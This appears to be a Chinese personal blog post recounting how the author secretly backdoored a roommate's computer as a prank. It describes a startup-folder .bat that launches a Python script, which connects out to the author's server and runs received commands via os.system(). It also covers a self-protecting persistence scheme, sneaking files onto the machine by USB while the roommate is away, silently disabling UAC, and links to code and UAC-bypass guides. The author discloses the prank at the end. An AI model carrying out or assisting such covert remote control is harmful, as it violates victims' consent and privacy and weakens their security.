Hack! 黑掉室友的电脑

注意

最近想整整我的室友,不过并不是真正的黑掉,只是想通过部署程序,最终达到神不知鬼不觉命令远程执行的目的。

思路

大致想通过开机自启动.bat执行脚本,远程连接我的服务器,我再用我的主机连接我的服务器,然后传输命令,让远程的执行程序执行。

社工

故意用室友的电脑给他表演怎样用python爬取bilibili的排行榜,至此已经部署好了python,这样用python作为脚本就行的通了。
寝室里的网络使用的是电信的闪讯,几乎每天都会更换ip地址,所以直接连接或者直接开端口都是很麻烦的,所以将我的服务器(固定ip地址)作为中转。

socket程序

直接利用socket传输消息,并直接进行简单粗暴的os.system()
由于程序是开机自启动,一开机并不会自动连接闪讯,所以先写了一个循环连接。

1
2
3
4
5
6
while 1:
try:
s.connect((ip, port))
break
except:
pass

之后就无脑执行就行了。
github链接:https://github.com/Jacobianoffame/hark4fun/tree/master/version1

第一次尝试

在室友正认真做物理实验报告的时候,偷偷带上u盘,拷上his.py和simple.bat就出发了。
his.py放在C:\ProgramData\里,把simple.bat放在C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp里(为了开机自动启动),然后双击bat启动。
之后兴奋地跑回自己电脑开了mine.py端,由于不会什么指令,只会dir两下,但也找到了惊喜~

不过,正当我炫耀我发现了他的秘密时,他轻易地查看了一下最近使用的文件,注意到了我刚刚搞的simple.bat,删掉之后重启了一下,我就不能控制他的电脑了。

修改

虽然bat能被删除,但是已经在运行的python脚本很难被察觉,要是能够在关机之前自动在C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp生成一个新的bat不就无敌了?
但在我试验之后,发现python程序并没有权限在系统文件夹里写入文件,os.system()并不是最高执行权限。
python完成windows请求权限:
https://blog.csdn.net/qq_17550379/article/details/79006655
python绕过uac获取windows权限:
https://blog.csdn.net/qq_17550379/article/details/79006718
其中第二种方法是通过修改注册表达到目的,虽然很nb,但是修改之后会比较明显(打开任务栏设置都会变成cmd窗口),而且想要还原也非常麻烦,毕竟也不是想真的日。
最后选择了偷偷把他电脑系统设置中的uac改成不提示,这样也可以达到目的,复原起来也很简单。
至此,bat文件和python文件相互保护措施就变成了,启动bat文件,在C:\ProgramData中自动生成his.pyhis.py保持读取bat文件,保护bat不被删除。
github链接:https://github.com/Jacobianoffame/hark4fun/tree/master/version2

第二次尝试

虽然我室友已经有了警惕心理,不让我随便带着u盘插他电脑,但是我还是趁他出去拿快递的时候找机会把qq.bat部署到启动目录,然后双击,并且把他的uac关闭,过程不超过30s。
之后美滋滋地开启我的mine.pydir一下,控制成功。

待续

感觉程序保护部分还有一些可以完善的,而且关闭了uac也不太安全(容易被其他病毒趁虚而入)。

由于怕没有uac他电脑真中毒我要背锅,还是告诉了他,先杀his.py的进程,再删除那两个文件,这样连锁的保护就失效了。

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

请我喝杯咖啡吧~

支付宝
微信